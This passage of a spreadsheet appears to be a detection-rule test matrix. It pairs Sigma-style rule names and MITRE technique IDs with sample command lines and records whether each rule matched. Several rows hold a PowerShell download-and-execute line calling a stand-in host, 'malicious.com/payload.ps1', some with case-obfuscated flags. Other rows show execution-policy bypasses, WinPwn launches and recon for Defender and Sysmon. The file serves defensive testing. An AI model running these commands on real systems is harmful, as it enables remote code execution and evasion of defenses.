          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8)</t>
        </is>
      </c>
      <c r="J1427" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1427" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1428" ht="15.75" customHeight="1" s="42">
      <c r="A1428" s="36" t="n"/>
      <c r="B1428" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1428" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1428" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1428" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /"c" "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F1428" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1428" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1428" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1428" s="36" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8)</t>
        </is>
      </c>
      <c r="J1428" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1428" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1429" ht="15.75" customHeight="1" s="42">
      <c r="A1429" s="36" t="n"/>
      <c r="B1429" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1429" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1429" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1429" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoLogo -NonInteractive -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1429" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1429" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1429" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1429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429" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1429" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1430" ht="15.75" customHeight="1" s="42">
      <c r="A1430" s="36" t="n"/>
      <c r="B1430" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1430" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1430" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1430" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoLogo -nOniNterAcTive -ExeCutioNPolICy Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1430" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1430" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1430" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1430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430" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1430" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1431" ht="15.75" customHeight="1" s="42">
      <c r="A1431" s="36" t="n"/>
      <c r="B1431" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1431" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1431" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1431" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoLogo -NoninTEraCTiVE -EXECUtIONpoLICy Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1431" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1431" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1431" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I143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431" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1431" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1432" ht="15.75" customHeight="1" s="42">
      <c r="A1432" s="36" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1432" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1432" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1432" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1432" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F1432" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1432" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1432" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1432" s="36" t="n"/>
      <c r="J1432" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1432" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1433" ht="15.75" customHeight="1" s="42">
      <c r="A1433" s="36" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1433" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1433" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1433" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1433" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F1433" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1433" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1433" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1433" s="36" t="n"/>
      <c r="J1433" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1433" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1434" ht="15.75" customHeight="1" s="42">
      <c r="A1434" s="36" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1434" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1434" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1434" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1434" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1434" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1434" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1434" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1434" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1434" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1434" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1435" ht="15.75" customHeight="1" s="42">
      <c r="A1435" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1435" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1435" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1435" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1435" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1435" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1435" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1435" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1435" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1435" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1435" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1436" ht="15.75" customHeight="1" s="42">
      <c r="A1436" s="36" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1436" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1436" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1436" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1436" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1436" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1436" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1436" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1436" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1436" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1436" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1437" ht="15.75" customHeight="1" s="42">
      <c r="A1437" s="36" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1437" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1437" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1437" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1437" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1437" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1437" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1437" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1437" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1437" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1437" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1438" ht="15.75" customHeight="1" s="42">
      <c r="A1438" s="36" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1438" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1438" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1438" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1438" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1438" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1438" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1438" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1438" s="36" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1438" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1438" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1439" ht="15.75" customHeight="1" s="42">
      <c r="A1439" s="36" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1439" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_software_discovery</t>
        </is>
      </c>
      <c r="C1439" s="36" t="inlineStr">
        <is>
          <t>Detected Windows Software Discovery</t>
        </is>
      </c>
      <c r="D1439" s="36" t="inlineStr">
        <is>
          <t>e13f668e-7f95-443d-98d2-1816a7648a7b</t>
        </is>
      </c>
      <c r="E1439" s="36" t="inlineStr">
        <is>
          <t>reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer"  /v  svcVersion</t>
        </is>
      </c>
      <c r="F1439" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1439" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1439" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1439" s="36" t="inlineStr">
        <is>
          <t>Detected Windows Software Discovery (e13f668e-7f95-443d-98d2-1816a7648a7b)</t>
        </is>
      </c>
      <c r="J1439" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1439" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1440" ht="15.75" customHeight="1" s="42">
      <c r="A1440" s="36" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1440" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_software_discovery</t>
        </is>
      </c>
      <c r="C1440" s="36" t="inlineStr">
        <is>
          <t>Detected Windows Software Discovery</t>
        </is>
      </c>
      <c r="D1440" s="36" t="inlineStr">
        <is>
          <t>e13f668e-7f95-443d-98d2-1816a7648a7b</t>
        </is>
      </c>
      <c r="E1440" s="36" t="inlineStr">
        <is>
          <t>reg "query" "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" "/v" svcVersion</t>
        </is>
      </c>
      <c r="F1440" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1440" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1440" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1440" s="36" t="inlineStr">
        <is>
          <t>Detected Windows Software Discovery (e13f668e-7f95-443d-98d2-1816a7648a7b)</t>
        </is>
      </c>
      <c r="J1440" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1440" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1441" ht="15.75" customHeight="1" s="42">
      <c r="A1441" s="36" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1441" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_software_discovery</t>
        </is>
      </c>
      <c r="C1441" s="36" t="inlineStr">
        <is>
          <t>Detected Windows Software Discovery</t>
        </is>
      </c>
      <c r="D1441" s="36" t="inlineStr">
        <is>
          <t>e13f668e-7f95-443d-98d2-1816a7648a7b</t>
        </is>
      </c>
      <c r="E1441" s="36" t="inlineStr">
        <is>
          <t>reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" -v svcVersion</t>
        </is>
      </c>
      <c r="F1441" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1441" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1441" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1441" s="36" t="n"/>
      <c r="J1441" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1441" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1442" ht="15.75" customHeight="1" s="42">
      <c r="A1442" s="43" t="inlineStr">
        <is>
          <t>t1518.001</t>
        </is>
      </c>
      <c r="B1442" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_security_keyword_lookup</t>
        </is>
      </c>
      <c r="C1442" s="43" t="inlineStr">
        <is>
          <t>Security Tools Keyword Lookup Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D1442" s="43" t="inlineStr">
        <is>
          <t>4fe074b4-b833-4081-8f24-7dcfeca72b42</t>
        </is>
      </c>
      <c r="E1442" s="43" t="inlineStr">
        <is>
          <t>tasklist | findstr /R "defende[r]"</t>
        </is>
      </c>
      <c r="F1442" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1442" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1442" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1442" s="43" t="inlineStr">
        <is>
          <t>Recon Command Output Piped To Findstr.EXE (ccb5742c-c248-4982-8c5c-5571b9275ad3)</t>
        </is>
      </c>
      <c r="J1442" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1442" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1443" ht="15.75" customHeight="1" s="42">
      <c r="A1443" s="36" t="n"/>
      <c r="B1443" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_sysmon_discovery_via_default_altitude</t>
        </is>
      </c>
      <c r="C1443" s="36" t="inlineStr">
        <is>
          <t>Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE</t>
        </is>
      </c>
      <c r="D1443" s="36" t="inlineStr">
        <is>
          <t>37db85d1-b089-490a-a59a-c7b6f984f480</t>
        </is>
      </c>
      <c r="E1443" s="36" t="inlineStr">
        <is>
          <t>fltmc.exe | findstr /R "38520[1]"</t>
        </is>
      </c>
      <c r="F1443" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1443" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1443" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1443" s="43" t="n"/>
      <c r="J1443" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1443" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1444" ht="15.75" customHeight="1" s="42">
      <c r="A1444" s="36" t="inlineStr">
        <is>
          <t>t1526</t>
        </is>
      </c>
      <c r="B1444" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_seatbelt</t>
        </is>
      </c>
      <c r="C1444" s="36" t="inlineStr">
        <is>
          <t>PUA - Seatbelt Execution</t>
        </is>
      </c>
      <c r="D1444" s="36" t="inlineStr">
        <is>
          <t>38646daa-e78f-4ace-9de0-55547b2d30da</t>
        </is>
      </c>
      <c r="E1444" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Data\Seatbelt.dll,main FullDFIR</t>
        </is>
      </c>
      <c r="F1444" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1444" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1444" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1444" s="36" t="n"/>
      <c r="J1444" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1444" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1445" ht="15.75" customHeight="1" s="42">
      <c r="A1445" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B1445" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1445" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1445" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1445" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F1445" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1445" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1445" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1445" s="43" t="n"/>
      <c r="J1445" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1445" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1446" ht="15.75" customHeight="1" s="42">
      <c r="A1446" s="36" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B1446" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1446" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1446" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1446" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F1446" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1446" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1446" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1446" s="43" t="n"/>
      <c r="J1446" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1446" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1447" ht="15.75" customHeight="1" s="42">
      <c r="A1447" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B1447" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1447" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1447" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1447" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1447" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1447" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1447" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1447" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1447" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1447" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1448" ht="15.75" customHeight="1" s="42">
      <c r="A1448" s="36" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B1448" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1448" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1448" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1448" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1448" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1448" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1448" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1448" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1448" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1448" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1449" ht="15.75" customHeight="1" s="42">
      <c r="A1449" s="36" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B1449" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1449" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1449" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1449" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1449" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1449" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1449" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1449" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1449" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1449" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1450" ht="15.75" customHeight="1" s="42">
      <c r="A1450" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B1450" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1450" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1450" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1450" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1450" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1450" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1450" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1450" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1450" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1450" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1451" ht="15.75" customHeight="1" s="42">
      <c r="A1451" s="36" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B1451" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1451" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1451" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1451" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1451" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1451" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1451" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1451" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1451" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1451" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1452" ht="15.75" customHeight="1" s="42">
      <c r="A1452" s="36" t="inlineStr">
        <is>
          <t>t1552</t>
        </is>
      </c>
      <c r="B1452" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_eventlog_content_recon</t>
        </is>
      </c>
      <c r="C1452" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious EventLog Recon Activity Using Log Query Utilities</t>
        </is>
      </c>
      <c r="D1452" s="36" t="inlineStr">
        <is>
          <t>beaa66d6-aa1b-4e3c-80f5-e0145369bfaf</t>
        </is>
      </c>
      <c r="E1452" s="43" t="inlineStr">
        <is>
          <t>powershell -Command "Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-TerminalServices-LocalSessionManager/Operational'; Id=21}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F1452" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1452" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1452" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1452" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious EventLog Recon Activity Using Log Query Utilities (beaa66d6-aa1b-4e3c-80f5-e0145369bfaf); Potentially Suspicious EventLog Recon Activity Using Log Query Utilities (beaa66d6-aa1b-4e3c-80f5-e0145369bfaf)</t>
        </is>
      </c>
      <c r="J1452" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1452" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1453" ht="15.75" customHeight="1" s="42">
      <c r="A1453" s="43" t="inlineStr">
        <is>
          <t>t1552</t>
        </is>
      </c>
